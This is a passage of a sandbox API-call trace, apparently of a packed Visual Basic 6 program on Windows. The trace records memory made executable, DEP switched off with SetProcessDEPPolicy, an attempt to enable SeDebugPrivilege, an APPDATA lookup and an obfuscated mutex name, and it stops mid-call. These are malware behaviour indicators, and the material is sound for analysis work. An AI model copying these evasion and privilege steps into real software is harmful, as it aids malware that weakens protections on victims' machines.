(lpAddress=0x120000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x120000 [0199.733] VirtualAlloc (lpAddress=0x120000, dwSize=0x9000, flAllocationType=0x1000, flProtect=0x4) returned 0x120000 [0199.733] VirtualAlloc (lpAddress=0x120000, dwSize=0xa000, flAllocationType=0x1000, flProtect=0x4) returned 0x120000 [0199.733] VirtualProtect (in: lpAddress=0x120000, dwSize=0xa000, flNewProtect=0x20, lpflOldProtect=0x30fb20 | out: lpflOldProtect=0x30fb20*=0x4) returned 1 [0199.733] GetCurrentProcess () returned 0xffffffff [0199.733] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x120000, dwSize=0xa000) returned 1 [0199.733] GetCurrentThreadId () returned 0xf0 [0199.808] GetCurrentThreadId () returned 0xf0 [0199.808] SetWindowTextA (hWnd=0x702de, lpString="Source") returned 1 [0199.808] NtdllDefWindowProc_A (hWnd=0x702de, Msg=0xc, wParam=0x0, lParam=0x30fa94) returned 0x1 [0199.808] RegOpenKeyA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\VBA\\Monitors", phkResult=0x30fa7c | out: phkResult=0x30fa7c*=0x0) returned 0x2 [0199.809] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0199.809] VirtualQuery (in: lpAddress=0x30f4a8, lpBuffer=0x30f48c, dwLength=0x1c | out: lpBuffer=0x30f48c*(BaseAddress=0x30f000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0199.809] IMalloc:Alloc (This=0x75e366bc, cb=0x64) returned 0x6cfd50 [0199.809] IMalloc:GetSize (This=0x75e366bc, pv=0x6cfd50) returned 0x64 [0199.810] GetCurrentThreadId () returned 0xf0 [0199.810] GetCurrentThreadId () returned 0xf0 [0199.810] GetCurrentThreadId () returned 0xf0 [0199.811] GetCurrentThreadId () returned 0xf0 [0199.811] GetCurrentThreadId () returned 0xf0 [0199.811] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xb4 [0199.812] GetVersionExA (in: lpVersionInformation=0x30f7a4*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x13c587c, dwMinorVersion=0x30f6f4, dwBuildNumber=0x30fa00, dwPlatformId=0x30fc98, szCSDVersion="\xcd\x1e\xe9\x77\xc3\x90\x15") | out: lpVersionInformation=0x30f7a4*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0199.812] GetKeyboardLayout (idThread=0x0) returned 0x4090409 [0199.812] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x72992cd8, cbMultiByte=-1, lpWideCharStr=0x30f7cc, cchWideChar=14 | out: lpWideCharStr="MS Sans Serif") returned 14 [0199.812] OleCreateFontIndirect () returned 0x0 [0199.813] lstrlenA (lpString="Source") returned 6 [0199.814] LoadIconA (hInstance=0x72940000, lpIconName=0x4b1) returned 0x17023b [0199.870] OleCreatePictureIndirect () returned 0x0 [0199.870] lstrlenA (lpString="Form1") returned 5 [0199.870] lstrlenA (lpString="ThunderRT6") returned 10 [0199.871] lstrcpyA (in: lpString1=0x30f7e0, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0199.871] lstrlenA (lpString="ThunderRT6Form") returned 14 [0199.871] lstrcpynA (in: lpString1=0x30f7ee, lpString2="DC", iMaxLength=116 | out: lpString1="DC") returned="DC" [0199.871] lstrlenA (lpString="ThunderRT6") returned 10 [0199.871] lstrcpyA (in: lpString1=0x30f774, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0199.871] GetClassInfoA (in: hInstance=0x72940000, lpClassName="ThunderRT6Form", lpWndClass=0x30f7a0 | out: lpWndClass=0x30f7a0) returned 0 [0199.871] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0199.871] RegisterClassA (lpWndClass=0x30f7a0) returned 0xcfc1ed [0199.871] lstrlenA (lpString="ThunderRT6") returned 10 [0199.871] lstrcpyA (in: lpString1=0x30f774, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0199.871] lstrlenA (lpString="ThunderRT6Form") returned 14 [0199.871] lstrcpynA (in: lpString1=0x30f782, lpString2="DC", iMaxLength=29 | out: lpString1="DC") returned="DC" [0199.871] RegisterClassA (lpWndClass=0x30f7a0) returned 0xc1ee [0199.871] AdjustWindowRectEx (in: lpRect=0x30f8a0, dwStyle=0x2000000, bMenu=0, dwExStyle=0x0 | out: lpRect=0x30f8a0) returned 1 [0199.871] CreateWindowExA (dwExStyle=0x0, lpClassName=0xc1ee, lpWindowName="Source", dwStyle=0x2000000, X=-1, Y=10, nWidth=14, nHeight=14, hWndParent=0x702de, hMenu=0x0, hInstance=0x72940000, lpParam=0x0) returned 0x20286 [0199.872] NtdllDefWindowProc_A (hWnd=0x20286, Msg=0x81, wParam=0x0, lParam=0x30f3c4) returned 0x1 [0199.872] SetWindowLongA (hWnd=0x20286, nIndex=-16, dwNewLong=33554432) returned 113246208 [0199.875] NtdllDefWindowProc_A (hWnd=0x20286, Msg=0x7c, wParam=0xfffffff0, lParam=0x30f01c) returned 0x0 [0199.875] NtdllDefWindowProc_A (hWnd=0x20286, Msg=0x7d, wParam=0xfffffff0, lParam=0x30f01c) returned 0x0 [0199.876] NtdllDefWindowProc_A (hWnd=0x20286, Msg=0x83, wParam=0x0, lParam=0x30f3b0) returned 0x0 [0199.876] GetSystemMenu (hWnd=0x20286, bRevert=0) returned 0x0 [0199.876] SetWindowContextHelpId (param_1=0x20286, param_2=0xffffffff) returned 1 [0199.876] NtdllDefWindowProc_A (hWnd=0x20286, Msg=0x1, wParam=0x0, lParam=0x30f3c4) returned 0x0 [0199.876] GetDC (hWnd=0x20286) returned 0x66010a68 [0199.876] GetTextMetricsA (in: hdc=0x66010a68, lptm=0x30f78c | out: lptm=0x30f78c) returned 1 [0199.876] SetBkMode (hdc=0x66010a68, mode=1) returned 2 [0199.876] OleTranslateColor () returned 0x0 [0199.876] SetBkColor (hdc=0x66010a68, color=0xf0f0f0) returned 0xffffff [0199.876] OleTranslateColor () returned 0x0 [0199.876] SetTextColor (hdc=0x66010a68, color=0x0) returned 0x0 [0199.876] OleTranslateColor () returned 0x0 [0199.876] CreatePen (iStyle=0, cWidth=1, color=0x0) returned 0xffffffff9d300a62 [0199.876] SelectObject (hdc=0x66010a68, h=0x9d300a62) returned 0x1b00017 [0199.876] SelectObject (hdc=0x66010a68, h=0x1900011) returned 0x1900010 [0199.876] ClientToScreen (in: hWnd=0x20286, lpPoint=0x30f76c | out: lpPoint=0x30f76c) returned 1 [0199.877] SetBrushOrgEx (in: hdc=0x66010a68, x=7, y=2, lppt=0x0 | out: lppt=0x0) returned 1 [0199.877] UnrealizeObject (h=0x1900015) returned 1 [0199.877] SelectObject (hdc=0x66010a68, h=0x1900015) returned 0x1900011 [0199.877] SelectObject (hdc=0x66010a68, h=0x970a0a72) returned 0x18a002e [0199.877] GetTextMetricsA (in: hdc=0x66010a68, lptm=0x30f580 | out: lptm=0x30f580) returned 1 [0199.877] GetClientRect (in: hWnd=0x20286, lpRect=0x30f920 | out: lpRect=0x30f920) returned 1 [0199.877] MapWindowPoints (in: hWndFrom=0x20286, hWndTo=0x0, lpPoints=0x30f920, cPoints=0x2 | out: lpPoints=0x30f920) returned 720895 [0199.877] EqualRect (lprc1=0x30f920, lprc2=0x30f900) returned 1 [0199.877] SetEvent (hEvent=0xb4) returned 1 [0199.878] IsIconic (hWnd=0x20286) returned 0 [0199.878] SendMessageA (hWnd=0x20286, Msg=0x80, wParam=0x1, lParam=0x17023b) returned 0x0 [0199.878] NtdllDefWindowProc_A (hWnd=0x20286, Msg=0x80, wParam=0x1, lParam=0x17023b) returned 0x0 [0199.879] IsIconic (hWnd=0x20286) returned 0 [0199.879] IsZoomed (hWnd=0x20286) returned 0 [0199.879] GetClientRect (in: hWnd=0x20286, lpRect=0x30f914 | out: lpRect=0x30f914) returned 1 [0199.879] GetWindow (hWnd=0x20286, uCmd=0x5) returned 0x0 [0199.879] SysStringLen (param_1="kernel32") returned 0x8 [0199.879] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="kernel32", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0199.879] SysStringLen (param_1="kernel32") returned 0x8 [0199.879] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="kernel32", cchWideChar=9, lpMultiByteStr=0x6ca3f4, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kernel32", lpUsedDefaultChar=0x0) returned 9 [0199.879] SetErrorMode (uMode=0x8001) returned 0x8001 [0199.879] LoadLibraryA (lpLibFileName="KERNEL32") returned 0x76220000 [0199.880] SetErrorMode (uMode=0x8001) returned 0x8001 [0199.880] GetProcAddress (hModule=0x76220000, lpProcName="GetModuleHandleA") returned 0x76231245 [0199.880] GetModuleHandleA (lpModuleName="kernel32") returned 0x76220000 [0199.880] GetLastError () returned 0x0 [0199.880] SysStringLen (param_1="SetProcessDEPPolicy") returned 0x13 [0199.880] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SetProcessDEPPolicy", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0199.880] SysStringLen (param_1="SetProcessDEPPolicy") returned 0x13 [0199.880] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SetProcessDEPPolicy", cchWideChar=20, lpMultiByteStr=0x6c9bfc, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SetProcessDEPPolicy", lpUsedDefaultChar=0x0) returned 20 [0199.880] SetErrorMode (uMode=0x8001) returned 0x8001 [0199.880] LoadLibraryA (lpLibFileName="KERNEL32") returned 0x76220000 [0199.880] SetErrorMode (uMode=0x8001) returned 0x8001 [0199.880] GetProcAddress (hModule=0x76220000, lpProcName="GetProcAddress") returned 0x76231222 [0199.880] GetProcAddress (hModule=0x76220000, lpProcName="SetProcessDEPPolicy") returned 0x7624eb9a [0199.880] GetLastError () returned 0x0 [0199.881] SetErrorMode (uMode=0x8001) returned 0x8001 [0199.881] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76220000 [0199.881] SetErrorMode (uMode=0x8001) returned 0x8001 [0199.881] GetProcAddress (hModule=0x76220000, lpProcName="SetProcessDEPPolicy") returned 0x7624eb9a [0199.881] SetProcessDEPPolicy (dwFlags=0x0) returned 1 [0199.881] GetLastError () returned 0x0 [0199.881] IsWindowVisible (hWnd=0x20286) returned 0 [0199.881] ShowWindow (hWnd=0x20286, nCmdShow=0) returned 0 [0199.882] GetCurrentThreadId () returned 0xf0 [0199.882] GetCurrentThreadId () returned 0xf0 [0199.882] GetCurrentThreadId () returned 0xf0 [0199.882] SetWindowTextA (hWnd=0x702de, lpString="Source") returned 1 [0199.882] NtdllDefWindowProc_A (hWnd=0x702de, Msg=0xc, wParam=0x0, lParam=0x3db1f0) returned 0x1 [0199.882] ShowWindow (hWnd=0x702de, nCmdShow=0) returned 1 [0199.882] NtdllDefWindowProc_A (hWnd=0x702de, Msg=0x18, wParam=0x0, lParam=0x0) returned 0x0 [0199.882] NtdllDefWindowProc_A (hWnd=0x702de, Msg=0x46, wParam=0x0, lParam=0x30f694) returned 0x0 [0199.884] NtdllDefWindowProc_A (hWnd=0x702de, Msg=0x47, wParam=0x0, lParam=0x30f694) returned 0x0 [0199.884] GetUserDefaultLCID () returned 0x409 [0199.884] GetUserDefaultLCID () returned 0x409 [0199.884] FindResourceExA (hModule=0x400000, lpType=0x6, lpName=0x1, wLanguage=0x409) returned 0x442160 [0199.884] LoadResource (hModule=0x400000, hResInfo=0x442160) returned 0x4426d0 [0199.884] LockResource (hResData=0x4426d0) returned 0x4426d0 [0199.885] GetUserDefaultLCID () returned 0x409 [0199.887] SafeArrayCopy (in: psa=0x6d1978, ppsaOut=0x30f6c4 | out: ppsaOut=0x30f6c4) returned 0x0 [0199.887] SetErrorMode (uMode=0x8001) returned 0x8001 [0199.887] LoadLibraryA (lpLibFileName="OLE32") returned 0x75cf0000 [0199.887] SetErrorMode (uMode=0x8001) returned 0x8001 [0199.887] GetProcAddress (hModule=0x75cf0000, lpProcName="CoCreateGuid") returned 0x75d315d5 [0199.887] CoCreateGuid (in: pguid=0x30f5a0 | out: pguid=0x30f5a0*(Data1=0xb818ea75, Data2=0x6586, Data3=0x4524, Data4=([0]=0xad, [1]=0xfe, [2]=0x50, [3]=0xd7, [4]=0x19, [5]=0x6, [6]=0x6d, [7]=0x2d))) returned 0x0 [0199.888] GetLastError () returned 0x0 [0199.888] SafeArrayAllocDescriptorEx (in: vt=0x11, cDims=0x1, ppsaOut=0x30f59c | out: ppsaOut=0x30f59c) returned 0x0 [0199.888] SetErrorMode (uMode=0x8001) returned 0x8001 [0199.888] LoadLibraryA (lpLibFileName="OLE32") returned 0x75cf0000 [0199.888] SetErrorMode (uMode=0x8001) returned 0x8001 [0199.888] GetProcAddress (hModule=0x75cf0000, lpProcName="StringFromGUID2") returned 0x75d322ec [0199.888] StringFromGUID2 (in: rguid=0x30f5a0*(Data1=0xb818ea75, Data2=0x6586, Data3=0x4524, Data4=([0]=0xad, [1]=0xfe, [2]=0x50, [3]=0xd7, [4]=0x19, [5]=0x6, [6]=0x6d, [7]=0x2d)), lpsz=0x6d1998, cchMax=80 | out: lpsz="{B818EA75-6586-4524-ADFE-50D719066D2D}") returned 39 [0199.888] GetLastError () returned 0x0 [0199.888] SafeArrayDestroyDescriptor (psa=0x6d1978) returned 0x0 [0199.889] GetUserDefaultLCID () returned 0x409 [0199.889] VarI4FromStr (in: strIn="0", lcid=0x409, dwFlags=0x0, plOut=0x30f634 | out: plOut=0x30f634) returned 0x0 [0199.890] GetUserDefaultLCID () returned 0x409 [0199.890] VarI4FromStr (in: strIn="0", lcid=0x409, dwFlags=0x0, plOut=0x30f634 | out: plOut=0x30f634) returned 0x0 [0199.890] GetUserDefaultLCID () returned 0x409 [0199.890] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x30f634 | out: plOut=0x30f634) returned 0x0 [0199.890] GetUserDefaultLCID () returned 0x409 [0199.890] VarI4FromStr (in: strIn="0", lcid=0x409, dwFlags=0x0, plOut=0x30f634 | out: plOut=0x30f634) returned 0x0 [0199.890] GetUserDefaultLCID () returned 0x409 [0199.891] SafeArrayCopy (in: psa=0x6d19d0, ppsaOut=0x30f6c0 | out: ppsaOut=0x30f6c0) returned 0x0 [0199.891] SafeArrayAllocDescriptorEx (in: vt=0x8, cDims=0x1, ppsaOut=0x43e0a4 | out: ppsaOut=0x43e0a4) returned 0x0 [0199.891] GetUserDefaultLCID () returned 0x409 [0199.892] SafeArrayAllocDescriptorEx (in: vt=0x8, cDims=0x1, ppsaOut=0x43e0a8 | out: ppsaOut=0x43e0a8) returned 0x0 [0199.892] GetUserDefaultLCID () returned 0x409 [0199.892] GetUserDefaultLCID () returned 0x409 [0199.892] VarI4FromStr (in: strIn="5", lcid=0x409, dwFlags=0x0, plOut=0x30f634 | out: plOut=0x30f634) returned 0x0 [0199.892] GetUserDefaultLCID () returned 0x409 [0199.892] VarI4FromStr (in: strIn="0", lcid=0x409, dwFlags=0x0, plOut=0x30f634 | out: plOut=0x30f634) returned 0x0 [0199.892] GetUserDefaultLCID () returned 0x409 [0199.892] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x30f634 | out: plOut=0x30f634) returned 0x0 [0199.892] VarBstrCmp (bstrLeft="0", bstrRight="-1", lcid=0x0, dwFlags=0x30001) returned 0x2 [0199.893] VarBstrCmp (bstrLeft="0", bstrRight="4", lcid=0x0, dwFlags=0x30001) returned 0x0 [0199.893] VarBstrCmp (bstrLeft="0", bstrRight="Server", lcid=0x0, dwFlags=0x30001) returned 0x0 [0199.893] VarBstrCmp (bstrLeft="0", bstrRight="0", lcid=0x0, dwFlags=0x30001) returned 0x1 [0199.893] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="APPDATA", cchWideChar=8, lpMultiByteStr=0x30f4e0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="APPDATA", lpUsedDefaultChar=0x0) returned 8 [0199.893] CompareStringA (Locale=0x0, dwCmpFlags=0x0, lpString1="", cchCount1=1, lpString2="", cchCount2=1) returned 2 [0199.893] CompareStringA (Locale=0x0, dwCmpFlags=0x1, lpString1="APPDATA=C:\\Users\\aETAdzjz\\AppData\\Roaming", cchCount1=7, lpString2="APPDATA", cchCount2=7) returned 2 [0199.893] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x21002b8, cbMultiByte=34, lpWideCharStr=0x6d2e94, cchWideChar=68 | out: lpWideCharStr="C:\\Users\\aETAdzjz\\AppData\\Roaming") returned 34 [0199.893] SysReAllocStringLen (in: pbstr=0x30f570*="C:\\Users\\aETAdzjz\\AppData\\Roaming", psz=0x0, len=0x21 | out: pbstr=0x30f570*="C:\\Users\\aETAdzjz\\AppData\\Roaming") returned 1 [0199.894] GetUserDefaultLCID () returned 0x409 [0199.894] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x30f634 | out: plOut=0x30f634) returned 0x0 [0199.894] GetUserDefaultLCID () returned 0x409 [0199.894] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x30f634 | out: plOut=0x30f634) returned 0x0 [0199.894] GetUserDefaultLCID () returned 0x409 [0199.894] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x30f634 | out: plOut=0x30f634) returned 0x0 [0199.894] GetUserDefaultLCID () returned 0x409 [0199.894] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x30f634 | out: plOut=0x30f634) returned 0x0 [0199.894] GetUserDefaultLCID () returned 0x409 [0199.894] VarR8FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, pdblOut=0x30f630 | out: pdblOut=0x30f630) returned 0x0 [0199.894] GetUserDefaultLCID () returned 0x409 [0199.894] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x30f634 | out: plOut=0x30f634) returned 0x0 [0199.894] GetUserDefaultLCID () returned 0x409 [0199.894] VarI4FromStr (in: strIn="0", lcid=0x409, dwFlags=0x0, plOut=0x30f634 | out: plOut=0x30f634) returned 0x0 [0199.894] GetUserDefaultLCID () returned 0x409 [0199.894] VarI4FromStr (in: strIn="2", lcid=0x409, dwFlags=0x0, plOut=0x30f634 | out: plOut=0x30f634) returned 0x0 [0199.894] GetUserDefaultLCID () returned 0x409 [0199.894] VarI4FromStr (in: strIn="0", lcid=0x409, dwFlags=0x0, plOut=0x30f634 | out: plOut=0x30f634) returned 0x0 [0199.894] GetUserDefaultLCID () returned 0x409 [0199.894] VarI4FromStr (in: strIn="0", lcid=0x409, dwFlags=0x0, plOut=0x30f634 | out: plOut=0x30f634) returned 0x0 [0199.894] GetUserDefaultLCID () returned 0x409 [0199.894] VarR8FromStr (in: strIn="0", lcid=0x409, dwFlags=0x0, pdblOut=0x30f630 | out: pdblOut=0x30f630) returned 0x0 [0199.894] SetErrorMode (uMode=0x8001) returned 0x8001 [0199.894] LoadLibraryA (lpLibFileName="KERNEL32") returned 0x76220000 [0199.895] SetErrorMode (uMode=0x8001) returned 0x8001 [0199.895] GetProcAddress (hModule=0x76220000, lpProcName="GetCurrentProcess") returned 0x76231809 [0199.895] GetCurrentProcess () returned 0xffffffff [0199.895] GetLastError () returned 0x0 [0199.895] SetErrorMode (uMode=0x8001) returned 0x8001 [0199.895] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76490000 [0199.895] SetErrorMode (uMode=0x8001) returned 0x8001 [0199.895] GetProcAddress (hModule=0x76490000, lpProcName="OpenProcessToken") returned 0x764a4304 [0199.895] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x22, TokenHandle=0x30f55c | out: TokenHandle=0x30f55c*=0xc4) returned 1 [0199.895] GetLastError () returned 0x0 [0199.895] SysStringLen (param_1="SeDebugPrivilege") returned 0x10 [0199.895] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SeDebugPrivilege", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0199.895] SysStringLen (param_1="SeDebugPrivilege") returned 0x10 [0199.895] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SeDebugPrivilege", cchWideChar=17, lpMultiByteStr=0x6d20c4, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SeDebugPrivilege", lpUsedDefaultChar=0x0) returned 17 [0199.895] SysStringLen (param_1="") returned 0x0 [0199.895] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 0 [0199.896] SysStringLen (param_1="") returned 0x0 [0199.896] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="", cchWideChar=1, lpMultiByteStr=0x6d1c2c, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 1 [0199.896] SetErrorMode (uMode=0x8001) returned 0x8001 [0199.896] LoadLibraryA (lpLibFileName="advapi32") returned 0x76490000 [0199.896] SetErrorMode (uMode=0x8001) returned 0x8001 [0199.896] GetProcAddress (hModule=0x76490000, lpProcName="LookupPrivilegeValueA") returned 0x764a404a [0199.896] LookupPrivilegeValueA (in: lpSystemName="", lpName="SeDebugPrivilege", lpLuid=0x30f56c | out: lpLuid=0x30f56c*(LowPart=0x14, HighPart=0)) returned 1 [0199.995] GetLastError () returned 0x0 [0199.996] SetErrorMode (uMode=0x8001) returned 0x8001 [0199.996] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76490000 [0199.996] SetErrorMode (uMode=0x8001) returned 0x8001 [0199.996] GetProcAddress (hModule=0x76490000, lpProcName="AdjustTokenPrivileges") returned 0x764a418e [0199.996] AdjustTokenPrivileges (in: TokenHandle=0xc4, DisableAllPrivileges=0, NewState=0x30f590*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x0))), BufferLength=0x30f568, PreviousState=0x30f574, ReturnLength=0x30f568 | out: PreviousState=0x30f574, ReturnLength=0x30f568) returned 0 [0199.996] GetLastError () returned 0x3e6 [0199.996] AdjustTokenPrivileges (in: TokenHandle=0xc4, DisableAllPrivileges=0, NewState=0x30f574*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x30f568, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0199.996] GetLastError () returned 0x514 [0199.996] SetErrorMode (uMode=0x8001) returned 0x8001 [0199.996] LoadLibraryA (lpLibFileName="KERNEL32") returned 0x76220000 [0199.997] SetErrorMode (uMode=0x8001) returned 0x8001 [0199.997] GetProcAddress (hModule=0x76220000, lpProcName="CloseHandle") returned 0x76231410 [0199.997] CloseHandle (hObject=0xc4) returned 1 [0199.997] GetLastError () returned 0x514 [0199.997] VarBstrCmp (bstrLeft="I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441", bstrRight=0x0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0199.997] SysStringLen (param_1="I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441") returned 0x24 [0199.997] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0199.997] SysStringLen (param_1="I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441") returned 0x24 [0199.997] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441", cchWideChar=37, lpMultiByteStr=0x6d1a74, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441", lpUsedDefaultChar=0x0) returned 37 [0199.997] SetErrorMode (uMode=0x8001) returned 0x8001 [0199.997] LoadLibraryA (lpLibFileName="KERNEL32") returned 0x76220000 [0199.997] SetErrorMode (uMode=0x8001) returned 0x8001 [0199.997] GetProcAddress (hModule=0x76220000, lpProcName="CreateMutexA") returned 0x76234c6b [0199.997] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441") returned 0xc4 [0199.998] GetLastError () returned 0x0 [0199.998] SysStringByteLen (bstr="㕉ㅅ㕓㑇䘭吴ⴳㅔ㍙䈭䤴ⴳ㕋㉗㍖あ㑖ㄴ") returned 0x24 [0199.998] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6d1a74, cbMultiByte=36, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0199.998] SysStringByteLen (bstr="㕉ㅅ㕓㑇䘭吴ⴳㅔ㍙䈭䤴ⴳ㕋㉗㍖あ㑖ㄴ") returned 0x24 [0199.998] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6d1a74, cbMultiByte=37, lpWideCharStr=0x6d2e94, cchWideChar=73 | out: lpWideCharStr="I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441") returned 37 [0199.998] SetErrorMode (uMode=0x8001) returned 0x8001 [0199.998] LoadLibraryA (lpLibFileName="KERNEL32") returned 0x76220000 [0199.998] SetErrorMode (uMode=0x8001) returned 0x8001 [0199.998] GetProcAddress (hModule=0x76220000, lpProcName="WaitForSingleObject") returned 0x76231136 [0199.998] WaitForSingleObject (hHandle=0xc4, dwMilliseconds=0x0) returned 0x0 [0199.998] GetLastError () returned 0x0 [0199.998] GetUserDefaultLCID () returned 0x409 [0199.998] VarR8FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, pdblOut=0x30f630 | out: pdblOut=0x30f630) returned 0x0 [0199.998] VarBstrCmp (bstrLeft="I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441", bstrRight=0x0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0199.999] VarCat (in: pvarLeft=0x30f54c, pvarRight=0x30f55c, pvarResult=0x30f53c | out: pvarResult=0x30f53c) returned 0x0 [0199.999] VarBstrCmp (bstrLeft="I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441", bstrRight=0x0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0199.999] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x30f478 | out: ppsaOut=0x30f478) returned 0x0 [0199.999] GetUserDefaultLCID () returned 0x409 [0199.999] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x30f248, cchData=6 | out: lpLCData="1252") returned 5 [0199.999] SysStringLen (param_1="kernel32") returned 0x9 [0199.999] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="kernel32", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0200.000] SysStringLen (param_1="kernel32") returned 0x9 [0200.000] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="kernel32", cchWideChar=10, lpMultiByteStr=0x6d1c2c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kernel32", lpUsedDefaultChar=0x0) returned 10 [0200.000] SafeArrayAllocDescriptorEx (in: vt=0x11, cDims=0x1, ppsaOut=0x30f258 | out: ppsaOut=0x30f258) returned 0x0 [0200.000] GetUserDefaultLCID () returned 0x409 [0200.000] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x30f248, cchData=6 | out: lpLCData="1252") returned 5 [0200.000] SysStringLen (param_1="GetFileAttributesW") returned 0x13 [0200.000] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetFileAttributesW", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0200.000] SysStringLen 